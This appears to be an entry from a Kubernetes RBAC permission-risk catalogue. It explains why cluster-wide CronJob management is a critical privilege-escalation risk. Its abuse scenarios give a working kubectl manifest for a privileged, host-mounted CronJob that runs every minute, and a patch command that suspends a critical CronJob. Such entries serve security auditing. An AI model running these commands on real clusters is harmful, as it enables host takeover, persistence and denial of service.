Manage CronJobs cluster-wide (scheduled privileged execution, persistence)
Elevation of Privilege
Critical
Overview
| Field | Value |
|---|---|
| ID | 1039 |
| Name | Manage CronJobs cluster-wide (scheduled privileged execution, persistence) |
| Risk Category | Elevation of Privilege |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | batch |
| Resources | cronjobs |
| Verbs | create, update, patch, delete |
| Tags | Persistence PrivilegeEscalation Tampering WorkloadLifecycle |
Description
Permits creating, updating, or deleting CronJobs across all namespaces. CronJobs schedule recurring batch jobs. This is critical as it allows scheduling the execution of pods (potentially privileged) at regular intervals, leading to privilege escalation, persistent access, and tampering.
Abuse Scenarios
- Create a new CronJob that schedules a privileged pod to run periodically.
kubectl create -n <namespace> -f - <<EOF
apiVersion: batch/v1
kind: CronJob
metadata:
name: privileged-cronjob
spec:
schedule: "*/1 * * * *" # Every minute
jobTemplate:
spec:
template:
spec:
hostNetwork: true
hostPID: true
containers:
- name: attacker
image: busybox
command: ["/bin/sh", "-c", "echo 'Pwned!' > /host/pwned.txt"]
securityContext:
privileged: true
volumeMounts:
- mountPath: /host
name: host-root
volumes:
- name: host-root
hostPath:
path: /
restartPolicy: OnFailure
EOF
# Example: kubectl create -n default -f - <<EOF ... EOF
- Suspend a critical CronJob, preventing scheduled tasks from running (DoS).
kubectl patch cronjob <cronjob-name> -n <namespace> -p '{"spec" : {"suspend" : true}}'
# Example: kubectl patch cronjob backup-db -n production -p '{"spec" : {"suspend" : true}}'